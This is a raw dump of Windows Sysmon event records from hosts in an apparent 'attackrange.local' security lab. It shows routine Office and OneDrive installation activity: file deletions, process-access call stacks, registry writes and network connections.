Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls\Styles\Flat\qtquickextrasflatplugin.dll2021-04-20 14:58:27.154 23542300x800000000000000079529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.154{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF8B058321DA34AA65.TMPMD5=754C7F53A80341F1141FB9FE0A3713C3,SHA256=453E2A79A182092804A1EFCAAEFF08C3735C8F5D80E7979A683C396D04F9A153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.107{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DF0A3193A674F032E6.TMPMD5=BF619EAC0CDF3F68D496EA9344137E8B,SHA256=076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 23542300x800000000000000079527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.091{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Temp\~DFDD997F733FC85020.TMPMD5=754C7F53A80341F1141FB9FE0A3713C3,SHA256=453E2A79A182092804A1EFCAAEFF08C3735C8F5D80E7979A683C396D04F9A153,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0124E4171A918FBBA3EBED6E948E27D4,SHA256=4BA599519677CB654C85E4817FB1E7BAA97A48D7D953BBF608F662D6F864C432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSIBDFB.tmpMD5=EFFF835C984473D724F2EC812660288A,SHA256=7A7E1F335DB3FFF2E7224E60AF78E7EB3522BF5B21122D826BDBC1D224309864,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000079524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=AECD880279991A031CA812A651BAB4BF,SHA256=40E42F135CB0C7D900B0DE3C229CF99F250C93F53223E4069B8CF86EC222EDCC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000079523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5342e|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5e62|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53398|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5e62|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5e62|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.044{A7A01FEF-EAF3-607E-6D0B-00000000BB01}44844816C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\SYSTEM32\msi.dll+f6bd2|C:\Windows\SYSTEM32\msi.dll+f8fdf|C:\Windows\SYSTEM32\msi.dll+f8764|C:\Windows\SYSTEM32\msi.dll+90994|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a5e62|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+4a6902|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+454fec|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+b0474|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c5a8d|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+c3bf7|C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe+188f9a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000050537Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:27.872{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3AC3D33C181476EEC8798EC4CE5F932,SHA256=53ABBFD7A1E5A75E8A082CB6B0F521EBE34A94BDA827CA78DDC8713D86F81053,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000079926Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.973{A7A01FEF-EC13-607E-450E-00000000BB01}3376C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exeHKLM\System\CurrentControlSet\Services\EventLog\Application\MicrosoftSearchInBing\EventMessageFileC:\Windows\Microsoft.NET\Framework\v4.0.30319\EventLogMessages.dll 10341000x800000000000000079925Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.952{A7A01FEF-B626-607E-1600-00000000BB01}15406300C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+8d212|C:\Windows\system32\wbem\wmiprvsd.dll+8dfd1|C:\Windows\system32\wbem\wmiprvsd.dll+3b42f|C:\Windows\system32\wbem\wmiprvsd.dll+d4be|C:\Windows\system32\wbem\wbemcore.dll+2af4f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 534500x800000000000000079924Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.875{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe 10341000x800000000000000079923Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\SHELL32.dll+240667(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x800000000000000079922Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\SHELL32.dll+240667(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1b2e|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+227d9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64) 10341000x800000000000000079921Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\SHELL32.dll+240667(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d 10341000x800000000000000079920Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\SHELL32.dll+240667(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+11f2e 10341000x800000000000000079919Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+192889(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\windows.storage.dll+2a8115(wow64)|C:\Windows\System32\windows.storage.dll+fd58f(wow64)|C:\Windows\System32\SHELL32.dll+24072c(wow64)|C:\Windows\System32\SHELL32.dll+240999(wow64)|C:\Windows\System32\SHELL32.dll+24062d(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d 354300x800000000000000079918Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.697{A7A01FEF-EAEC-607E-660B-00000000BB01}6840C:\Temp\OfficeSetup.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57564-false52.109.12.23-443https 354300x800000000000000079917Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.511{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57563-false93.184.220.29-80http 10341000x800000000000000079916Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.872{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19280a(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\windows.storage.dll+2a8115(wow64)|C:\Windows\System32\windows.storage.dll+fd58f(wow64)|C:\Windows\System32\SHELL32.dll+24072c(wow64)|C:\Windows\System32\SHELL32.dll+240999(wow64)|C:\Windows\System32\SHELL32.dll+24062d(wow64)|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+10139|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+ff75|C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe+1199d 354300x800000000000000079915Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.470{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57562-false52.114.75.150-443https 354300x800000000000000079914Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.450{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local62545- 10341000x800000000000000079913Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.871{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\windows.storage.dll+2a8115(wow64)|C:\Windows\System32\windows.storage.dll+fd58f(wow64)|C:\Windows\System32\SHELL32.dll+24072c(wow64)|C:\Windows\System32\SHELL32.dll+240999(wow64) 354300x800000000000000079912Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.310{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-25387-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000079911Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.871{A7A01FEF-EC14-607E-4A0E-00000000BB01}42085672C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+1927f5(wow64)|C:\Windows\System32\SHELL32.dll+19239c(wow64)|C:\Windows\System32\shlwapi.dll+29a9e(wow64)|C:\Windows\System32\windows.storage.dll+2a8115(wow64)|C:\Windows\System32\windows.storage.dll+fd58f(wow64)|C:\Windows\System32\SHELL32.dll+24072c(wow64)|C:\Windows\System32\SHELL32.dll+240999(wow64)|C:\Windows\System32\SHELL32.dll+24062d(wow64) 10341000x800000000000000079910Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 